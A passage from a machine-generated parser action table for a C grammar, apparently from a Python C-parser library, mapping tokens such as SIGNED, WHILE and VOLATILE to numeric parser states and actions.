-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,56,-118,-71,-103,-337,-9,-131,-91,-10,-96,-98,56,-131,-95,-101,-97,56,-53,-126,56,-88,56,56,-93,56,-147,-335,-146,56,-167,-166,-182,-100,-126,56,-87,-90,-94,-92,-61,-72,56,-144,-142,56,56,56,-73,56,-89,56,56,56,-149,-159,-160,-156,-336,56,-183,-30,56,56,-74,56,56,56,56,-174,-175,56,-143,-140,56,-141,-145,-76,-79,-82,-75,-77,56,-81,-215,-214,-80,-216,-78,-127,56,-153,56,-151,-148,-157,-168,-69,-36,-35,56,56,56,-234,-233,56,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,56,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'SIGNED':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,105,109,111,118,119,120,121,122,123,124,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,211,214,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[54,-337,-113,-128,54,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,54,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,54,-29,-121,-116,-62,-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,54,-118,-71,-103,-337,-9,-131,-91,-10,-96,-98,54,-131,-95,-101,-97,54,-53,-126,54,-88,54,54,-93,54,-147,-335,-146,54,-167,-166,-182,-100,-126,54,-87,-90,-94,-92,-61,-72,54,-144,-142,54,54,54,-73,54,-89,54,54,54,-149,-159,-160,-156,-336,54,-183,-30,54,54,-74,54,54,54,54,-174,-175,54,-143,-140,54,-141,-145,-76,-79,-82,-75,-77,54,-81,-215,-214,-80,-216,-78,-127,54,-153,54,-151,-148,-157,-168,-69,-36,-35,54,54,54,-234,-233,54,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,54,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'CONTINUE':([61,97,119,124,181,191,284,285,286,289,291,298,300,301,302,303,305,307,308,332,424,425,428,429,432,435,437,438,439,440,496,497,500,502,505,506,510,535,536,537,539,554,555,557,558,569,574,575,576,577,578,579,],[-71,-335,-87,-72,293,-336,-76,-79,-82,-75,-77,293,-81,-215,-214,-80,-216,293,-78,-69,-234,-233,-231,293,-217,-230,293,-84,-218,293,-229,-232,-221,293,-83,-219,-68,293,-220,293,293,-225,-224,-222,-84,293,293,-226,-223,293,-228,-227,]),'NOT':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244
,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,151,-335,-28,-182,-27,151,-337,-87,-72,-337,151,-286,-285,151,151,-283,-287,-288,151,-284,151,151,151,-336,-183,151,151,-28,-337,151,-28,-337,-337,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,-337,-76,-79,-82,-75,151,-77,151,151,-81,-215,-214,-80,-216,151,-78,151,151,-69,-284,151,151,-284,151,151,-244,-247,-245,-241,-242,-246,-248,151,-250,-251,-243,-249,-12,151,151,-11,151,151,151,151,-234,-233,151,-231,151,151,-217,151,-230,151,-84,-218,151,151,151,-337,-337,-198,151,151,151,-337,-284,-229,-232,151,-221,151,-83,-219,-68,151,-28,-337,151,-11,151,151,-220,151,151,151,-284,151,151,151,-337,151,-225,-224,-222,-84,151,151,151,-226,-223,151,-228,-227,]),'OREQUAL':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,-276,-323,-312,-336,366,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'MOD':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,260,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,260,260,260,260,260,260,260,260,260,260,-257,-256,260,260,260,260,260,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'RSHIFT':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,242,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-261,242,-262,-260,242,242,242,-259,242,242,-257,-256,242,242,242,242,242,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'DEFAULT':([61,97,119,124,181,191,284,285,286,289,291,298,300,301,302,303,305,307,308,332,424,425,428,429,432,435,437,438,439,440,496,497,500,502,505,506,510,535,536,537,539,554,555,557,558,569,574,575,576,577,578,579,],[-71,-335,-87,-72,295,-336,-76,-79,-82,-75,-77,295,-81,-215,-214,-80,-216,295,-78,-69,-234,-233,-231,295,-217,-230,295,-84,-218,295,-229,-232,-221,295,-83,-219,-68,295,-220,295,295,-225,-224,-222,-84,295,295,-226,-223,295,-228,-227,]),'_NORETURN':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,
21,22,23,25,26,27,29,30,33,34,36,38,39,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,65,68,71,75,76,80,81,82,86,87,89,90,93,96,97,98,100,101,109,111,118,119,123,124,129,180,181,182,187,191,200,211,223,240,241,278,284,285,286,289,291,298,300,301,302,303,305,308,312,314,316,317,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[20,20,-113,-128,20,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,20,-120,-115,-65,-102,20,-131,-108,-238,-111,-122,-63,-129,-29,-121,-116,-62,-112,-70,-52,-123,-117,20,20,-119,20,-114,-130,20,-118,-71,-103,20,-131,-96,-98,20,-131,-95,-101,-97,-53,20,20,-88,20,-147,-335,-146,-167,-166,-100,-126,20,-87,-61,-72,20,-73,20,-89,-149,-336,-30,20,-74,-174,-175,20,-76,-79,-82,-75,-77,20,-81,-215,-214,-80,-216,-78,-127,-153,-151,-148,-168,-69,-36,-35,20,20,20,-234,-233,20,-231,-217,-230,-81,-84,-218,-152,-150,-170,-169,-31,-34,20,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'__INT128':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,105,109,111,118,119,120,121,122,123,124,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,211,214,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[43,-337,-113,-128,43,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,43,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,43,-29,-121,-116,-62,-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,43,-118,-71,-103,-337,-9,-131,-91,-10,-96,-98,43,-131,-95,-101,-97,43,-53,-126,43,-88,43,43,-93,43,-147,-335,-146,43,-167,-166,-182,-100,-126,43,-87,-90,-94,-92,-61,-72,43,-144,-142,43,43,43,-73,43,-89,43,43,43,-149,-159,-160,-156,-336,43,-183,-30,43,43,-74,43,43,43,43,-174,-175,43,-143,-140,43,-141,-145,-76,-79,-82,-75,-77,43,-81,-215,-214,-80,-216,-78,-127,43,-153,43,-151,-148,-157,-168,-69,-36,-35,43,43,43,-234,-233,43,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,43,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'WHILE':([61,97,119,124,181,191,284,285,286,289,291,298,300,301,302,303,305,307,308,332,424,425,428,429,432,435,436,437,438,439,440,496,497,500,502,505,506,510,535,536,537,539,554,555,557,558,569,574,575,576,577,578,579,],[-71,-335,-87,-72,296,-336,-76,-79,-82,-75,-77,296,-81,-215,-214,-80,-216,296,-78,-69,-234,-233,-231,296,-217,-230,504,296,-84,-218,296,-229,-232,-221,296,-83,-219,-68,296,-220,296,296,-225,-224,-222,-84,296,296,-226,-223,296,-228,-227,]),'U8CHAR_CONST':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513
,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,154,-335,-28,-182,-27,154,-337,-87,-72,-337,154,-286,-285,154,154,-283,-287,-288,154,-284,154,154,154,-336,-183,154,154,-28,-337,154,-28,-337,-337,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,-337,-76,-79,-82,-75,154,-77,154,154,-81,-215,-214,-80,-216,154,-78,154,154,-69,-284,154,154,-284,154,154,-244,-247,-245,-241,-242,-246,-248,154,-250,-251,-243,-249,-12,154,154,-11,154,154,154,154,-234,-233,154,-231,154,154,-217,154,-230,154,-84,-218,154,154,154,-337,-337,-198,154,154,154,-337,-284,-229,-232,154,-221,154,-83,-219,-68,154,-28,-337,154,-11,154,154,-220,154,154,154,-284,154,154,154,-337,154,-225,-224,-222,-84,154,154,154,-226,-223,154,-228,-227,]),'_ALIGNOF':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,155,-335,-28,-182,-27,155,-337,-87,-72,-337,155,-286,-285,155,155,-283,-287,-288,155,-284,155,155,155,-336,-183,155,155,-28,-337,155,-28,-337,-337,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,-337,-76,-79,-82,-75,155,-77,155,155,-81,-215,-214,-80,-216,155,-78,155,155,-69,-284,155,155,-284,155,155,-244,-247,-245,-241,-242,-246,-248,155,-250,-251,-243,-249,-12,155,155,-11,155,155,155,155,-234,-233,155,-231,155,155,-217,155,-230,155,-84,-218,155,155,155,-337,-337,-198,155,155,155,-337,-284,-229,-232,155,-221,155,-83,-219,-68,155,-28,-337,155,-11,155,155,-220,155,155,155,-284,155,155,155,-337,155,-225,-224,-222,-84,155,155,155,-226,-223,155,-228,-227,]),'EXTERN':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,65,68,71,75,76,80,81,82,86,87,89,90,93,96,97,98,100,101,109,111,118,119,123,124,129,180,181,182,187,191,200,211,223,240,241,278,284,285,286,289,291,298,300,301,302,303,305,308,312,314,316,317,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[13,13,-113,-128,13,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,13,-120,-115,-65,-102,13,-131,-108,-238,-111,-122,-63,-129,-29,-121,-116,-62,-112,-70,-52,-123,-117,13,13,-119,13,-114,-130,13,-118,-71,-103,13,-131,-96,-98,13,-131,-95,-101,-97,-53,13,13,-88,13,-147,-335,-146,-167,-166,-100,-126,13,-87,-61,-72,13,-73,13,-89,-149,-336,-30,13,-74,-174,-175,13,-76,-79,-82,-75,-77,13,-81,-215,-214,-80,-216,-78,-127,-153,-151,-148,-168,-69,-36,-35,13,13,13,-234,-233,13,-231,-217,-230,-81,-84,-218,-152,-150,-170,-169,-31,-34,13,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'CASE':([61,97,119,124,181,191,284,285,286,289,291,298,300,301,302,303,305,307,308,332,424,425,428,429,432,435,437,438,439,440,496,497,500,502,505,506,510,535,536,
537,539,554,555,557,558,569,574,575,576,577,578,579,],[-71,-335,-87,-72,297,-336,-76,-79,-82,-75,-77,297,-81,-215,-214,-80,-216,297,-78,-69,-234,-233,-231,297,-217,-230,297,-84,-218,297,-229,-232,-221,297,-83,-219,-68,297,-220,297,297,-225,-224,-222,-84,297,297,-226,-223,297,-228,-227,]),'LAND':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,255,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-261,255,-262,-260,-264,-268,-263,-259,-266,-271,-257,-256,-265,-272,-267,-269,-270,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'REGISTER':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,65,68,71,75,76,80,81,82,86,87,89,90,93,96,97,98,100,101,109,111,118,119,123,124,129,180,181,182,187,191,200,211,223,240,241,278,284,285,286,289,291,298,300,301,302,303,305,308,312,314,316,317,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[62,62,-113,-128,62,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,62,-120,-115,-65,-102,62,-131,-108,-238,-111,-122,-63,-129,-29,-121,-116,-62,-112,-70,-52,-123,-117,62,62,-119,62,-114,-130,62,-118,-71,-103,62,-131,-96,-98,62,-131,-95,-101,-97,-53,62,62,-88,62,-147,-335,-146,-167,-166,-100,-126,62,-87,-61,-72,62,-73,62,-89,-149,-336,-30,62,-74,-174,-175,62,-76,-79,-82,-75,-77,62,-81,-215,-214,-80,-216,-78,-127,-153,-151,-148,-168,-69,-36,-35,62,62,62,-234,-233,62,-231,-217,-230,-81,-84,-218,-152,-150,-170,-169,-31,-34,62,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'MODEQUAL':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,-276,-323,-312,-336,359,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'NE':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,247,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-261,247,-262,-260,-264,-268,-263,-259,-266,247,-257,-256,-265,247,-267,247,247,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'SWITCH':([61,97,119,124,181,191,284,285,286,289,291,298,300,301,302,303,305,307,308,332,424,425,428,429,432,435,437,438,439,440,496,497,500,502,505,506,510,535,536,537,539,554,555,557,558,569,574,575,576,577,578,579,],[-71,-335,-87,-72,299,-336,-76,-79,-82,-75,-77,299,-81,-215,-214,-80,-216,299,-78,
-69,-234,-233,-231,299,-217,-230,299,-84,-218,299,-229,-232,-221,299,-83,-219,-68,299,-220,299,299,-225,-224,-222,-84,299,299,-226,-223,299,-228,-227,]),'INT_CONST_HEX':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,160,-335,-28,-182,-27,160,-337,-87,-72,-337,160,-286,-285,160,160,-283,-287,-288,160,-284,160,160,160,-336,-183,160,160,-28,-337,160,-28,-337,-337,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,-337,-76,-79,-82,-75,160,-77,160,160,-81,-215,-214,-80,-216,160,-78,160,160,-69,-284,160,160,-284,160,160,-244,-247,-245,-241,-242,-246,-248,160,-250,-251,-243,-249,-12,160,160,-11,160,160,160,160,-234,-233,160,-231,160,160,-217,160,-230,160,-84,-218,160,160,160,-337,-337,-198,160,160,160,-337,-284,-229,-232,160,-221,160,-83,-219,-68,160,-28,-337,160,-11,160,160,-220,160,160,160,-284,160,160,160,-337,160,-225,-224,-222,-84,160,160,160,-226,-223,160,-228,-227,]),'_COMPLEX':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,105,109,111,118,119,120,121,122,123,124,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,211,214,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[60,-337,-113,-128,60,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,60,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,60,-29,-121,-116,-62,-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,60,-118,-71,-103,-337,-9,-131,-91,-10,-96,-98,60,-131,-95,-101,-97,60,-53,-126,60,-88,60,60,-93,60,-147,-335,-146,60,-167,-166,-182,-100,-126,60,-87,-90,-94,-92,-61,-72,60,-144,-142,60,60,60,-73,60,-89,60,60,60,-149,-159,-160,-156,-336,60,-183,-30,60,60,-74,60,60,60,60,-174,-175,60,-143,-140,60,-141,-145,-76,-79,-82,-75,-77,60,-81,-215,-214,-80,-216,-78,-127,60,-153,60,-151,-148,-157,-168,-69,-36,-35,60,60,60,-234,-233,60,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,60,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'PPPRAGMASTR':([61,],[124,]),'PLUSEQUAL':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,-276,-323,-312,-336,362,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'U32CHAR_C
ONST':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,138,-335,-28,-182,-27,138,-337,-87,-72,-337,138,-286,-285,138,138,-283,-287,-288,138,-284,138,138,138,-336,-183,138,138,-28,-337,138,-28,-337,-337,138,138,138,138,138,138,138,138,138,138,138,138,138,138,138,138,138,138,138,138,138,138,138,138,-337,-76,-79,-82,-75,138,-77,138,138,-81,-215,-214,-80,-216,138,-78,138,138,-69,-284,138,138,-284,138,138,-244,-247,-245,-241,-242,-246,-248,138,-250,-251,-243,-249,-12,138,138,-11,138,138,138,138,-234,-233,138,-231,138,138,-217,138,-230,138,-84,-218,138,138,138,-337,-337,-198,138,138,138,-337,-284,-229,-232,138,-221,138,-83,-219,-68,138,-28,-337,138,-11,138,138,-220,138,138,138,-284,138,138,138,-337,138,-225,-224,-222,-84,138,138,138,-226,-223,138,-228,-227,]),'CONDOP':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,258,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-261,-273,-262,-260,-264,-268,-263,-259,-266,-271,-257,-256,-265,-272,-267,-269,-270,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'U8STRING_LITERAL':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,139,146,148,149,150,151,153,163,165,166,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,235,236,237,238,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,163,-335,-28,-182,-27,163,-337,-87,-72,-337,163,-286,-285,-330,163,-327,163,-283,-287,236,-328,-288,-329,163,-284,163,163,163,-336,-183,163,163,-28,-337,163,-28,-337,-337,163,163,163,-334,-332,-331,-333,163,163,163,163,163,163,163,163,163,163,163,163,163,163,163,163,163,163,163,163,163,-337,-76,-79,-82,-75,163,-77,163,163,-81,-215,-214,-80,-216,163,-78,163,163,-69,-284,163,163,-284,163,163,-244,-247,-245,-241,-242,-246,-248,163,-250,-251,-243,-249,-12,163,163,-11,163,163,163,163,-234,-233,163,-231,163,163,-217,163,-230,163,-84,-218,163,163,163,-337,-337,-198,163,163,163,-337,-284,-229,-232,163,-221,163,-83,-219,-68,163,-28,-337,163,-11,163,163,-220,163,163,163,-284,163,163,163,-337,163,-225,-224,-222,-84,163,163,163,-226,-22
3,163,-228,-227,]),'BREAK':([61,97,119,124,181,191,284,285,286,289,291,298,300,301,302,303,305,307,308,332,424,425,428,429,432,435,437,438,439,440,496,497,500,502,505,506,510,535,536,537,539,554,555,557,558,569,574,575,576,577,578,579,],[-71,-335,-87,-72,304,-336,-76,-79,-82,-75,-77,304,-81,-215,-214,-80,-216,304,-78,-69,-234,-233,-231,304,-217,-230,304,-84,-218,304,-229,-232,-221,304,-83,-219,-68,304,-220,304,304,-225,-224,-222,-84,304,304,-226,-223,304,-228,-227,]),'VOLATILE':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,35,36,38,39,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,65,68,71,75,76,80,81,82,85,86,87,89,90,93,95,96,97,98,99,100,101,103,105,109,111,117,118,119,123,124,128,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,205,206,211,219,220,223,229,231,233,239,240,241,267,269,275,278,279,280,282,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,459,460,496,497,500,505,506,510,511,512,514,515,536,554,555,557,558,575,576,578,579,],[58,58,-113,-128,58,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,58,-120,-115,-65,-102,58,-131,-108,-238,-111,58,-122,-63,-129,-29,-121,-116,-62,-112,-70,-52,-123,-117,58,58,-119,58,-114,-130,58,-118,-71,-103,58,-131,-96,-98,58,-131,-95,-101,-97,58,-53,58,58,-88,58,58,-147,-335,-146,58,-167,-166,58,-182,-100,-126,58,58,-87,-61,-72,58,58,-144,-142,58,58,58,-73,58,-89,58,58,58,-149,-159,-160,-156,-336,58,-183,-30,58,58,58,58,58,-74,58,58,58,58,-174,-175,58,-143,-140,58,-141,-145,58,-76,-79,-82,-75,-77,58,-81,-215,-214,-80,-216,-78,-127,58,-153,58,-151,-148,-157,-168,-69,-36,-35,58,58,58,-234,-233,58,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,58,58,-229,-232,-221,-83,-219,-68,-33,-32,58,58,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'PPPRAG